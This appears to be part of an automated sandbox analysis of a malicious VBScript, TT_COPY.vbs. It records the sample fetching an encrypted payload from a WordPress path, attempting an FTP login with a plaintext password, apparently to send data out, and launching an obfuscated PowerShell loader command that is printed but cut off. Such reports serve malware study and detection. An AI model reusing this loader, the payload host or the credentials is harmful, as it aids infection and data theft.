                                        Dec 1, 2022 15:50:08.440819979 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440831900 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440844059 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440864086 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440877914 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440890074 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440901041 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440912962 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440924883 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440936089 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440948009 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440959930 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440970898 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440983057 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440994978 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441005945 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441018105 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441025019 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025019 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025019 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025972 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025972 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025972 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025972 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025972 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441034079 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441047907 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441047907 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441047907 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441051960 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441066980 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441072941 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441072941 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441083908 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441097975 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441121101 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441219091 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441289902 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557050943 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557151079 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557178974 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557190895 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557203054 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557205915 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557230949 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557245016 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557256937 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557275057 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557275057 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557277918 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557293892 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557306051 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557318926 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557322979 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557323933 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557323933 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557341099 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557353973 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557365894 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557410002 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557420969 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557440996 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557470083 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557518959 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557568073 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:13.319366932 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:13.319550037 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:15.844718933 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:50:15.876802921 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:15.876933098 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:50:15.910717964 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:15.911051989 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:50:15.943064928 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:15.943161011 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:15.943381071 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:50:16.014626980 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:19.780215979 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:19.783906937 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:50:19.816060066 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:19.816215038 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:50:19.816740990 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:19.816981077 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:51:57.762777090 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:51:58.074925900 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:51:58.684145927 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:51:59.887095928 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:52:02.292809010 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:52:07.104397058 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:52:16.711529970 CET4982480192.168.11.20192.185.145.188

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 1, 2022 15:50:07.807889938 CET5360453192.168.11.201.1.1.1
                                        Dec 1, 2022 15:50:07.826406956 CET53536041.1.1.1192.168.11.20
                                        Dec 1, 2022 15:50:15.606538057 CET5241253192.168.11.201.1.1.1
                                        Dec 1, 2022 15:50:15.837896109 CET53524121.1.1.1192.168.11.20

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Dec 1, 2022 15:50:07.807889938 CET192.168.11.201.1.1.10xab96Standard query (0)b3solutionscws.comA (IP address)IN (0x0001)false
                                        Dec 1, 2022 15:50:15.606538057 CET192.168.11.201.1.1.10xa887Standard query (0)ftp.mcmprint.netA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Dec 1, 2022 15:50:07.826406956 CET1.1.1.1192.168.11.200xab96No error (0)b3solutionscws.com192.185.145.188A (IP address)IN (0x0001)false
                                        Dec 1, 2022 15:50:15.837896109 CET1.1.1.1192.168.11.200xa887No error (0)ftp.mcmprint.net185.31.121.136A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • b3solutionscws.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.11.2049824192.185.145.18880C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                        TimestampkBytes transferredDirectionData
                                        Dec 1, 2022 15:50:07.952996969 CET223OUTGET /wp-admin/ZCaVuIfIpDLfuryX16 HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: b3solutionscws.com
                                        Cache-Control: no-cache
                                        Dec 1, 2022 15:50:08.081645966 CET225INHTTP/1.1 200 OK
                                        Date: Thu, 01 Dec 2022 14:50:08 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade
                                        Last-Modified: Wed, 30 Nov 2022 23:29:13 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 213568
                                        Data Raw: a0 14 a5 9b 0f dd 17 a9 73 1d 5a 1d 24 ac 7d 3e 8f 55 34 ab 6d a4 bc 09 00 fb 68 bf 55 4d 72 08 a2 70 41 d8 50 da 8c b7 63 34 56 18 f5 2f 36 a8 74 70 9a c4 af 9e 6f 03 f9 69 2f e3 28 ed 4d 97 36 8a ff 87 2f 3a 04 47 53 7d 4c e4 47 9a e9 aa 78 f6 04 21 96 6a f8 6b 2f f6 3b f8 70 b1 40 e0 c0 3d f4 21 e2 ff 1d 4d f4 ca 87 a7 26 d9 80 d6 93 6f f9 ae 09 ff 74 6b 7a c3 65 0d df 03 34 0c 1e 92 3a 62 0a f4 fc 58 31 14 96 4e 2b 65 90 31 6b 15 48 87 00 42 cf 2c e6 a2 d4 6d 2d 28 49 6d c2 0e 3f c3 dd 12 71 64 b9 68 c0 cc f7 9e 76 0e 7c 55 3f 5f 1e 7c 60 56 f5 8a 1d b5 39 a2 4f 13 fd db f9 90 6c 24 5b 56 f4 f0 89 ec de da 31 e7 24 87 d1 46 22 92 4b 51 32 17 d5 40 32 5f 7d b8 62 61 ef e4 73 b5 ac f4 01 a9 d3 02 bb 7e 91 28 ad ae 57 9a 05 fc 8e fe 2b 22 d9 9c 40 d7 58 2e bb ca 8d 45 94 73 26 b4 7c 2c 32 c7 b9 45 f3 f5 cf 13 0b f8 2a 0a e2 ca 5d 57 db a8 41 b3 4d 6a 26 0e e7 e7 e2 89 f2 98 3a 41 ef dd 36 8e f4 68 79 1c 19 fc 7a c1 70 a0 42 d6 e7 a1 a2 fe f5 4c 5c 15 ad cc c7 a6 f2 ea cc c4 30 8f 03 b5 24 52 e2 fd c5 ee c9 a3 94 fb 41 9c b0 d4 41 f4 eb 2b 49 b2 ae 43 80 72 68 b1 69 70 c8 5f ff 9d 64 0c 0a 36 18 bf cc b7 38 b9 09 b4 6f 37 3c fa c7 b1 bb 1f 69 72 59 23 ee aa 48 f5 97 cc a1 48 f0 b2 00 50 f0 69 d6 cd 9b c2 44 2d b7 06 f0 79 0e fe aa 41 9d 48 24 56 46 1b 03 c0 94 51 4c db a3 43 cc 4d e5 1f 9b 01 14 7b d7 f3 e8 d2 55 94 54 d0 38 f8 c9 60 f8 69 a7 12 9c 56 63 3d 6c 63 c8 24 3d be f1 7b ad 13 89 53 df 6b b1 e5 b2 c9 c8 55 48 25 69 9d 1f c8 1d 2d a7 b2 58 82 ce 09 f7 f1 cd 73 36 6f 07 78 73 ef cd 6f 7d 40 45 36 79 db 99 c3 95 7f 50 17 39 7b 77 9e 79 43 c9 c2 e0 e3 4f 6c 62 8b f9 a6 b4 75 0a 96 ea a8 a3 d6 92 50 ea 1b 58 12 76 7c 39 c6 93 78 d4 39 5b 9a 56 b9 91 ac ae 68 60 ee fd b7 30 a1 59 6e f0 b5 f0 c8 8e ed 0d ac 6e a0 f0 4b 63 05 75 68 98 5f 93 51 52 9e 5d c5 d3 19 09 c7 a1 65 74 7e 93 f1 6b 20 e2 05 ee 20 a3 ed 78 7d 48 a5 1f 3b 68 6d f6 b7 39 44 14 62 0b 6d 90 f5 7e c4 d2 93 10 e0 64 8b f7 ad e2 c7 10 77 8e 48 8e 77 cf 37 88 84 ce 0d d8 ac e3 75 ef f9 79 50 1b eb a5 9a 4e 6d 75 44 27 f5 17 6d 7b eb 74 06 55 38 22 e3 07 cb 0d 6b 91 48 0d 40 b6 36 7f b1 a9 3c b4 cf fa 71 5c 46 2e 63 4c d3 65 f9 8d 4c 45 02 d9 2b 45 a5 c6 29 24 c6 c0 75 d7 88 a1 3b 8c 46 23 af 34 c0 f8 7e 43 c7 9a 8a 5c 23 da ef 03 e0 43 4f bc 8f be 2f 5e 9a 97 61 c0 9f d0 f7 ab 32 52 99 7e f5 be 9e b4 c0 b1 89 77 27 dc a7 a1 eb 14 a1 9a 83 78 e4 b1 d5 46 5f 14 5a 6e a1 66 38 cf 2a 33 45 01 e5 70 b7 57 da f6 6b 0c c7 86 89 b7 ca f1 54 fb dd 02 79 53 f3 05 0b 1f 9f 17 49 ac d6 ce cd 6d aa 43 b9 fa a4 66 bb aa 91 33 f5 ca 71 98 6d 2b 61 19 e5 a2 23 1e 25 bf 04 eb f5 51 d4 c4 50 39 58 8a 45 8d fe da 10 2c 5f 0c 70 a8 ad 06 c5 cf 1f aa c6 f1 ef 64 ae 5a ab d6 34 10 66 42 7b d0 7e 91 27 11 1f 47 50 6a b2 e5 94 67 f1 a1 c0 f1 12 df 97 46 fa 7c 64 f6 3c e0 8e b0 6c e2 eb 3f df c2 9c fb 1d 4d f0 a5 8a a7 26 d3 aa c5 a3 6d f9 80 09 ff 74 6e 7a c3 74 1b 54 28 2f 0c 17 9a 7e 6d 26 42 ed 9e 10 ab 81 fc e7 68 c6 4e 09 66 6f ef 8c 2c 84 5c ac cd df ed 4e 45 0f 13 b6 2e 57 8e ef 60 04 00 b3 01 ae ff 83 d3 25 06 11 3a 5b 3c 30 71 7c 4a da a1 06 b5 3e b5 b1 12 81 9c e1 9b 20 22 4e a8 f6 db cd 98 d5 da 36 ff da 86 fd 44 e9 90 62 b3 3b 3e ce 40 32 6f 54 ab 52 65 ef c8 73 b5 ac f3 6f f1 c1 14 b0 75 8a 28 aa b9 a9 9b 29 fe d6 f5 2b 05 cf 62 41 f9 5a
                                        Data Ascii: sZ$}>U4mhUMrpAPc4V/6tpoi/(M6/:GS}LGx!jk/;p@=!M&otkze4:bX1N+e1kHB,m-(Im?qdhv|U?_|`V9Ol$[V1$F"KQ2@2_}bas~(W+"@X.Es&|,2E*]WAMj&:A6hyzpBL\0$RAA+ICrhip_d68o7<irY#HHPiD-yAH$VFQLCM{UT8`iVc=lc$={SkUH%i-Xs6oxso}@E6yP9{wyCOlbuPXv|9x9[Vh`0YnnKcuh_QR]et~k x}H;hm9Dbm~dwHw7uyPNmuD'm{tU8"kH@6<q\F.cLeLE+E)$u;F#4~C\#CO/^a2R~w'xF_Znf8*3EpWkTySImCf3qm+a#%QP9XE,_pdZ4fB{~'GPjgF|d<l?M&mtnztT(/~m&BhNfo,\NE.W`%:[<0q|J> "N6Db;>@2oTResou()+bAZ
                                        Dec 1, 2022 15:50:08.081737995 CET226INData Raw: 39 b4 ca 8a 5d 6a 72 0a b6 53 2e 19 24 69 40 f3 f5 cd 9b 1c f8 2a 02 c8 d9 6d 55 db 80 43 b3 0d e7 26 0e e6 f1 e9 b2 e9 98 3d 56 01 dc 1a 9c ec 63 79 1b 0f 02 6b ed 72 b7 49 d6 e0 b9 5c ff d9 4e 6f 4f 85 2f 96 8e e7 ea cc ae 19 9c 2b b4 24 11 e2
                                        Data Ascii: 9]jrS.$i@*mUC&=VcykrI\NoO/+$JF*e:BrCs{Xce 4#d7;9qyY$TIHQkF'{AB$VWjDX>e!~|/Ilq+gJ$:zQke?|\d6Ccxw
                                        Dec 1, 2022 15:50:08.081804037 CET227INData Raw: 45 28 c8 2f 49 83 3a 28 24 cc c9 1a fa 88 a1 20 85 5a 1b b0 34 d6 eb 9f 56 15 99 be 4c 2a fd 99 17 e1 6f 33 ba 84 be 2c 6e 4a 96 4d c8 6c be b3 67 4c 53 93 61 e4 c2 90 b4 d1 bf bc 6e e9 df 8b 84 c3 96 a1 98 85 67 fe b4 da 6d 55 10 42 75 a1 66 38
                                        Data Ascii: E(/I:($ Z4VL*o3,nJMlgLSangmUBuf8L3E'wF.pZpM#yj-^:9/?wU*[&:}#a`Y#bFjp;(E|xt:E4":ko;a;_I0 o'bzaX+
                                        Dec 1, 2022 15:50:08.081902027 CET229INData Raw: c4 a3 9d e3 bf 9d 9c d8 3f fc eb 2b 4d 08 95 bc 73 8d 71 bc 69 79 d7 55 01 9c 48 53 08 59 55 bf cc bd 23 34 11 b4 6f 36 30 f2 d1 99 dc 1d 69 74 fb 2b f9 d4 55 f5 97 c8 89 1e f2 b2 06 78 b7 6b d6 cb f4 8d 44 0d bd a4 f0 61 26 96 a8 41 9b ea 2c 4f
                                        Data Ascii: ?+MsqiyUHSYU#4o60it+UxkDa&A,OnKZ_M7q[HT2I:l`;sj$4zIkl7~Zj6Uv[4D|2W@^|9*q/CjJ&tP]v|x[9+sWbYn]n
                                        Dec 1, 2022 15:50:08.082016945 CET230INData Raw: 45 0c 9c ea b6 7b d2 c7 66 24 b8 9c 77 b0 e1 9c 43 f8 f6 e7 79 4f f3 05 0b 58 b2 17 49 ac 93 b9 fd 6f a0 49 bf d2 dd 67 bb ac 87 4a c0 e0 6a 9e 14 22 9f 18 cd 88 1d 15 25 b2 7d 71 f4 7d dc f5 5d 11 25 90 bb 8a d5 b7 79 2f 74 e9 70 b5 ad 06 c5 88
                                        Data Ascii: E{f$wCyOXIoIgJj"%}q}]%y/tp5X2nyF{,:aEdeHdi1p/=M%o"tkeg4nF*D_r'mZn(e` ?,sF2qk$O&T;E5
                                        Dec 1, 2022 15:50:08.082114935 CET232INData Raw: bf 94 51 0e 07 b2 4a a3 30 e5 1f 91 df 18 6a f0 ab 8a bb 28 fb 0b d0 4c ca 16 71 f0 26 db 12 9c 66 71 35 03 06 c8 24 37 60 fd 6a a5 3f 8e 42 d7 04 ee e5 92 c3 14 4b 6a 57 1a eb 50 fd 0c 2b c4 86 58 82 ca 06 8a f1 cd 7d 1a 76 16 42 0b d8 cd 6f 79
                                        Data Ascii: QJ0j(Lq&fq5$7`j?BKjWP+X}vBoyX*Iy'9?6l/tlbuJvgRzTr91h`Y0Yn|nK+uhQ~(_?*it~k& Hy}H;h9Hbm~qe(aH{7tqz
                                        Dec 1, 2022 15:50:08.082199097 CET233INData Raw: fe d2 e7 b2 7a ba fe 23 8a 4e 57 7b d0 65 57 34 3a 04 46 7f 69 4c e4 b2 4d 48 aa c0 fc 70 39 96 6a f9 eb 76 f6 3b fc 76 a5 68 6d c2 3d f2 39 6f f8 1d 4d f5 d9 83 b6 22 cf a8 59 91 6f ff 0c 18 fb 63 68 d8 d2 61 00 56 17 20 14 9d de 80 6c 0b 53 f0
                                        Data Ascii: z#NW{eW4:FiLMHp9jv;vhm=9oM"YochaV lSANwmZ^["9`I1.0s0qg(N$T7kLKP?>@2ompatq>x(SXVi.vtz,4E2- ]Qr0=
                                        Dec 1, 2022 15:50:08.082284927 CET234INData Raw: 78 f7 92 ca 8c 57 8e 15 39 3d fb f1 0f 2b a6 b0 e4 f9 bd 6d 4e 93 f0 31 9f 25 0a 94 e0 a4 b1 94 b9 cd e8 1b 5e 3a 27 7c 39 cc 31 63 c7 3d 1b 8b 52 e4 9a 52 af 44 6c e7 e3 c9 2e a1 59 6a 52 aa fc db da b5 1f a8 71 b7 0e 4a 07 1f 72 40 39 5d 96 57
                                        Data Ascii: xW9=+mN1%^:'|91c=RRDl.YjRqJr@9]W?_;a\+a-$|bA[ddFdrz_,Jqm(e_wPmj#~M'JA\d'0Y*jS\LG;E8#G 48CpC9B
                                        Dec 1, 2022 15:50:08.082384109 CET236INData Raw: 97 13 ce e8 c6 59 04 15 ab f7 72 27 a4 56 e8 0b f4 0e 46 4b 59 36 b6 2e 57 ad f4 0f c1 0a 99 0b bd ea 98 89 34 28 7e fc 5b 3a 3a 05 07 5c d1 8b 0e b1 3e dc 7b 13 ad 94 96 5b 20 25 52 7a db e6 cb a7 73 d8 31 e1 4b 4b d1 46 c8 ba 84 50 39 1c f1 52
                                        Data Ascii: Yr'VFKY6.W4(~[::\>{[ %Rzs1KKFP9R#aV`gU,`WQ)tX$Ex72hl+-W13+?iO6@AvCL)3#$G`:aCf@~ipwdH,45<
                                        Dec 1, 2022 15:50:08.082484007 CET237INData Raw: c1 3f de 0d d0 5c 64 58 7d 9a e2 6f 26 f3 01 f5 de a2 c1 7f 74 40 3f 14 27 7b 69 f6 a6 3d 5c ea 63 27 63 b8 4e 7c c4 d4 bb cf e0 64 81 fa b4 f1 c3 10 66 8a 51 70 76 e3 32 9e 88 d4 1e c2 ae da 70 f9 07 72 56 06 fe 9e 9a 4e 7c 7b 70 7f 87 3d 6f 50
                                        Data Ascii: ?\dX}o&t@?'{i=\c'cN|dfQpv2prVN|{p=oPirS]44qX'c]^Ji+\"#rLEMBo##hZ} XLS~dx|7]yUlG;|a_,u\QwHya
                                        Dec 1, 2022 15:50:08.199069977 CET238INData Raw: b2 0d 8b ef e4 79 9d 7e f6 6f f7 bf ef bb 5e 9b 47 43 ae 57 90 16 f0 df f2 3f 2a 0a 9e 40 d3 40 a3 b8 ca 8d 44 87 62 37 a5 6e 04 64 c5 b9 43 51 e4 de a4 20 02 2b 08 e4 68 4c 46 cf bc 57 9b 97 ef 26 04 df f6 e2 99 f8 8b 36 50 f3 c9 1e 4a f6 68 7f
                                        Data Ascii: y~o^GCW?*@@Db7ndCQ +hLFW&6PJhjqS+LBV3PcRW>)I4Rf|A_u<3G>6irX0ZHBA,m&dA`VFo\0j-LI:4l`7d4R


                                        FTP Packets

                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Dec 1, 2022 15:50:15.910717964 CET2149825185.31.121.136192.168.11.20220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                        Dec 1, 2022 15:50:15.911051989 CET4982521192.168.11.20185.31.121.136USER noffice@mcmprint.net
                                        Dec 1, 2022 15:50:15.943161011 CET2149825185.31.121.136192.168.11.20331 User noffice@mcmprint.net OK. Password required
                                        Dec 1, 2022 15:50:15.943381071 CET4982521192.168.11.20185.31.121.136PASS 2K-0}h.[5hb)
                                        Dec 1, 2022 15:50:19.780215979 CET2149825185.31.121.136192.168.11.20530 Login authentication failed
                                        Dec 1, 2022 15:50:19.816060066 CET2149825185.31.121.136192.168.11.20530 Logout.

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:15:50:14
                                        Start date:01/12/2022
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
                                        Imagebase:0x7ff6961b0000
                                        File size:170496 bytes
                                        MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Target ID:2
                                        Start time:15:50:34
                                        Start date:01/12/2022
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra 